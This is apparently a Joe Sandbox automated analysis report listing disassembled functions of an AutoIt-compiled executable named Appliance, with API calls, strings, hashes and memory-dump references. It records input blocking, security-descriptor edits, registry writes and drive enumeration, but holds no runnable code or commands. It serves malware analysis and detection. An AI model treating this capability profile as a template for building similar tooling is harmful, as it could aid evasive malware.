Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 3ca4777436b2b41215376ceff793457ea99e02b938790bece53dfbbc92dd7c8a
Instruction ID: 66a956820cebc2c85d7a0b671e8a2f99a15ec046eae87277ce61f34ec1da0fb7
Opcode Fuzzy Hash: 3ca4777436b2b41215376ceff793457ea99e02b938790bece53dfbbc92dd7c8a
Instruction Fuzzy Hash: 5EE012312102056FC7109F6AD804E96BBD9EFA4761F008429F949D7251DA70AD41CBA1

Function 00DE0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00DE075E), ref: 00DE0D4A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fed490f4703e77d1a66ce045f6d10e5290bf25cec984fc0e2a26a2439daafda6
Instruction ID: 33cf4f917386daa4ab6bd305d7eca44bca44f20cf51b18ecce26062755843b92
Opcode Fuzzy Hash: fed490f4703e77d1a66ce045f6d10e5290bf25cec984fc0e2a26a2439daafda6
Instruction Fuzzy Hash:

Function 00E4353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00E4358D
DeleteObject.GDI32(00000000), ref: 00E435A0
DestroyWindow.USER32 ref: 00E435AF
GetDesktopWindow.USER32 ref: 00E435CA
GetWindowRect.USER32(00000000), ref: 00E435D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00E43700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00E4370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E43755
GetClientRect.USER32(00000000,?), ref: 00E43761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E4379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E437BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E437D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E437DD
GlobalLock.KERNEL32(00000000), ref: 00E437E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E437F5
GlobalUnlock.KERNEL32(00000000), ref: 00E437FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E43805
GlobalFree.KERNEL32(00000000), ref: 00E43810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E43822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00E60C04,00000000), ref: 00E43838
GlobalFree.KERNEL32(00000000), ref: 00E43848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00E4386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00E4388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E438AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E43A9C

Strings

AutoIt v3, xrefs: 00E4374F
DISPLAY, xrefs: 00E438FF
static, xrefs: 00E43797, 00E438EE
, xrefs: 00E43A22

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: aa205c84ca5b2d168a4288577922458a84466e2ff83dc7836035a82863cd4d20
Instruction ID: d8b30b9bc8c4a7f364fba712b65e9e84302bf3fa257c26c4d51c59bab432e8f2
Opcode Fuzzy Hash: aa205c84ca5b2d168a4288577922458a84466e2ff83dc7836035a82863cd4d20
Instruction Fuzzy Hash: 68028E71900206AFDB28DF65DD89EAE7BB9EF48311F008559F915AB2A0CB74AD05CF60

Function 00DC1625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00DC16B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00E02B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E02B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E02F85

Part of subcall function 00DC1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DC1488,?,00000000,?,?,?,?,00DC145A,00000000,?), ref: 00DC1865

SendMessageW.USER32(?,00001053), ref: 00E02FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E02FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00E02FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00E02FF9

Strings

(, xrefs: 00E03035
(, xrefs: 00E02B86
0, xrefs: 00E02E11
(, xrefs: 00E02CA1

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$($($(
API String ID: 2760611726-1684351147
Opcode ID: 7cd7ce3c89a1d19e2c7a0a6e2096c5a5a172c00d44688f9c263da7a1cf3bb21c
Instruction ID: a38461dc10b52d29224d8f195e7fbcb3b48bdcc5a4284b77252ea30b83c102da
Opcode Fuzzy Hash: 7cd7ce3c89a1d19e2c7a0a6e2096c5a5a172c00d44688f9c263da7a1cf3bb21c
Instruction Fuzzy Hash: 6E12B234204212EFDB25CF24C888F69B7E5FB45305F18556EE685AB2A1C731EC8ADB51

Function 00E4316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00E4319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E432C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00E43306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00E43316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00E4335D
GetClientRect.USER32(00000000,?), ref: 00E43369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00E433B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E433C1
GetStockObject.GDI32(00000011), ref: 00E433D1
SelectObject.GDI32(00000000,00000000), ref: 00E433D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00E433E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E433EE
DeleteDC.GDI32(00000000), ref: 00E433F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E43423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00E4343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00E4347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E4348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00E4349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00E434D4
GetStockObject.GDI32(00000011), ref: 00E434DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E434EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00E434F4

Strings

AutoIt v3, xrefs: 00E43355
msctls_progress32, xrefs: 00E43470
DISPLAY, xrefs: 00E433B7
static, xrefs: 00E433AC, 00E434CE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: ee0b648e443ad1d14aa1a6aae88dcb8a07a61195f21aab6d92ae565d93ced249
Instruction ID: d18a6b37f9fb705e680d9bb18250b03fc6108077e71ce72b39b952523c10d181
Opcode Fuzzy Hash: ee0b648e443ad1d14aa1a6aae88dcb8a07a61195f21aab6d92ae565d93ced249
Instruction Fuzzy Hash: C1B15E71A00205BFDB24DFB5DC45FAEBBA9EB08711F004519FA15E72A0D7B4AD44CBA4

Function 00E35524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E35532
GetDriveTypeW.KERNEL32(?,00E5DC30,?,\\.\,00E5DCD0), ref: 00E3560F
SetErrorMode.KERNEL32(00000000,00E5DC30,?,\\.\,00E5DCD0), ref: 00E3577B

Strings

PhysicalDrive, xrefs: 00E355BB
FileBackedVirtual, xrefs: 00E35731
Network, xrefs: 00E35647
SAS, xrefs: 00E3570E
RAMDisk, xrefs: 00E35639
CDROM, xrefs: 00E35640
SSA, xrefs: 00E356EB
MMC, xrefs: 00E35723
RAID, xrefs: 00E35700
USB, xrefs: 00E356F9
SATA, xrefs: 00E35715
\\.\, xrefs: 00E35584
SSD, xrefs: 00E3568F
Fibre, xrefs: 00E356F2
ATA, xrefs: 00E356DD
iSCSI, xrefs: 00E35707
Virtual, xrefs: 00E3572A
1394, xrefs: 00E356E4
Removable, xrefs: 00E35655, 00E3565A
ATAPI, xrefs: 00E356D6
Fixed, xrefs: 00E3564E
SCSI, xrefs: 00E356CF
Unknown, xrefs: 00E35632, 00E356C8

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2e76df6c0ba27ddab441ab0ba583745f328241e0de942a9d5187e3b1864cf6e2
Instruction ID: 0b25c967d308785fc9101b472b8ef78f9190746fbd063a07c5369737d55d0185
Opcode Fuzzy Hash: 2e76df6c0ba27ddab441ab0ba583745f328241e0de942a9d5187e3b1864cf6e2
Instruction Fuzzy Hash: CD61B332A08A05DFC724EF24C99ADB87BA1EF45354F34641AE44EBB391C631DD41CBA1

Function 00DC2521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DC25F8
GetSystemMetrics.USER32(00000007), ref: 00DC2600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DC262B
GetSystemMetrics.USER32(00000008), ref: 00DC2633
GetSystemMetrics.USER32(00000004), ref: 00DC2658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DC2675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DC2685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DC26B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DC26CC
GetClientRect.USER32(00000000,000000FF), ref: 00DC26EA
GetStockObject.GDI32(00000011), ref: 00DC2706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC2711

Part of subcall function 00DC19CD: GetCursorPos.USER32(?), ref: 00DC19E1
Part of subcall function 00DC19CD: ScreenToClient.USER32(00000000,?), ref: 00DC19FE
Part of subcall function 00DC19CD: GetAsyncKeyState.USER32(00000001), ref: 00DC1A23
Part of subcall function 00DC19CD: GetAsyncKeyState.USER32(00000002), ref: 00DC1A3D

SetTimer.USER32(00000000,00000000,00000028,00DC199C), ref: 00DC2738

Strings

<), xrefs: 00DC255C
(, xrefs: 00E03909
AutoIt v3 GUI, xrefs: 00DC26B0
<), xrefs: 00E039A6
(, xrefs: 00DC271A
(, xrefs: 00DC2749

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: <)$<)$AutoIt v3 GUI$($($(
API String ID: 1458621304-3080182634
Opcode ID: 3e149027e72b51211315c417491b2c5cd6a23eec7e10826fed11fa1ea68fdc83
Instruction ID: 6a8948473cf2c5b9bf578077afd1da165916479b22e8ebb5d7bd780537c66dd7
Opcode Fuzzy Hash: 3e149027e72b51211315c417491b2c5cd6a23eec7e10826fed11fa1ea68fdc83
Instruction Fuzzy Hash: 67B15B35A0020AAFDF18DFA9CC45FAE7BB5EB88315F10421AFA15A72D0D774D944CB61

Function 00E51A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E51BC4
GetDesktopWindow.USER32 ref: 00E51BD9
GetWindowRect.USER32(00000000), ref: 00E51BE0
GetWindowLongW.USER32(?,000000F0), ref: 00E51C35
DestroyWindow.USER32(?), ref: 00E51C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E51C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E51CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E51CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00E51CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E51CE1
IsWindowVisible.USER32(00000000), ref: 00E51D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E51D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E51D6C
GetWindowRect.USER32(00000000,?), ref: 00E51D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00E51DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00E51DC4
CopyRect.USER32(?,?), ref: 00E51DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00E51E46

Strings

0, xrefs: 00E51B6F
tooltips_class32, xrefs: 00E51C82
(, xrefs: 00E51DB7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 58e81ea454488691d0b62be52b5e5100459d7ec696ae7eea21c19c724ce31ea8
Instruction ID: 8b1bba2634e83ad0e4901294ebab5f62460339e2d1155ad3bf1915f34cb17d85
Opcode Fuzzy Hash: 58e81ea454488691d0b62be52b5e5100459d7ec696ae7eea21c19c724ce31ea8
Instruction Fuzzy Hash: 6EB19D71608301AFD714DF64C884B5ABBE5EF84315F008D5DF999AB261CB71E849CBA2

Function 00E50CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00E50D81
_wcslen.LIBCMT ref: 00E50DBB
_wcslen.LIBCMT ref: 00E50E25
_wcslen.LIBCMT ref: 00E50E8D
_wcslen.LIBCMT ref: 00E50F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E50F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E50FA0

Part of subcall function 00DDFD52: _wcslen.LIBCMT ref: 00DDFD5D

Part of subcall function 00E22B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E22BA5
Part of subcall function 00E22B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E22BD7

Strings

GETSUBITEMCOUNT, xrefs: 00E50E20, 00E50E3B
ISSELECTED, xrefs: 00E50F79
VIEWCHANGE, xrefs: 00E51111
SELECTCLEAR, xrefs: 00E50FC9
GETSELECTED, xrefs: 00E5107D
SELECTALL, xrefs: 00E50FB1
GETITEMCOUNT, xrefs: 00E50DB2, 00E50DD3
SELECT, xrefs: 00E50FE4
GETSELECTEDCOUNT, xrefs: 00E50F0C, 00E50F27
DESELECT, xrefs: 00E51038
SELECTINVERT, xrefs: 00E5101A
GETTEXT, xrefs: 00E50E88, 00E50EA3
FINDITEM, xrefs: 00E510C3

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 66798546f5b3877732b3664f291f06923e95675be25137d3a29cac5094d6f9c5
Instruction ID: 1d957ab4c1557b79c5148d46ce872a2dbf81efe68188827071e1c7562797d66a
Opcode Fuzzy Hash: 66798546f5b3877732b3664f291f06923e95675be25137d3a29cac5094d6f9c5
Instruction Fuzzy Hash: CFE1AF312183418FCB14EF24C95196AB3E6FF84319B145D9DF89AAB3A1DB30ED49CB61

Function 00E216D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E21A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E21A60
Part of subcall function 00E21A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A6C
Part of subcall function 00E21A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A7B
Part of subcall function 00E21A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A82
Part of subcall function 00E21A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E21A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E21741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E21775
GetLengthSid.ADVAPI32(?), ref: 00E2178C
GetAce.ADVAPI32(?,00000000,?), ref: 00E217C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E217E2
GetLengthSid.ADVAPI32(?), ref: 00E217F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E21801
HeapAlloc.KERNEL32(00000000), ref: 00E21808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E21829
CopySid.ADVAPI32(00000000), ref: 00E21830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E2185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E21881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E21893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E218BA
HeapFree.KERNEL32(00000000), ref: 00E218C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E218CA
HeapFree.KERNEL32(00000000), ref: 00E218D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E218DA
HeapFree.KERNEL32(00000000), ref: 00E218E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00E218ED
HeapFree.KERNEL32(00000000), ref: 00E218F4

Part of subcall function 00E21ADF: GetProcessHeap.KERNEL32(00000008,00E214FD,?,00000000,?,00E214FD,?), ref: 00E21AED
Part of subcall function 00E21ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E214FD,?), ref: 00E21AF4
Part of subcall function 00E21ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E214FD,?), ref: 00E21B03

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: d67b1e1901071e04215d8e0d764acd6203a8da47fc26b4a5fa147c8836ff58ce
Instruction ID: dfcf61553ddb1c2f9147f0016fb5d251c1bc5c1586cc2699371c56f1eb847e43
Opcode Fuzzy Hash: d67b1e1901071e04215d8e0d764acd6203a8da47fc26b4a5fa147c8836ff58ce
Instruction Fuzzy Hash: 047189B2D04219AFDF28DFA5EC84FAEBBB9AF14315F144565E904F6290D7309A05CBA0

Function 00E4CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00E5DCD0,00000000,?,00000000,?,?), ref: 00E4CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00E4D004
_wcslen.LIBCMT ref: 00E4D054
_wcslen.LIBCMT ref: 00E4D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00E4D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00E4D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00E4D2AD
RegCloseKey.ADVAPI32(?), ref: 00E4D2E1
RegCloseKey.ADVAPI32(00000000), ref: 00E4D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00E4D3C0

Strings

REG_DWORD, xrefs: 00E4D264
REG_MULTI_SZ, xrefs: 00E4D155
REG_BINARY, xrefs: 00E4D373
REG_QWORD, xrefs: 00E4D323
REG_EXPAND_SZ, xrefs: 00E4D02D
REG_SZ, xrefs: 00E4D0A4

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
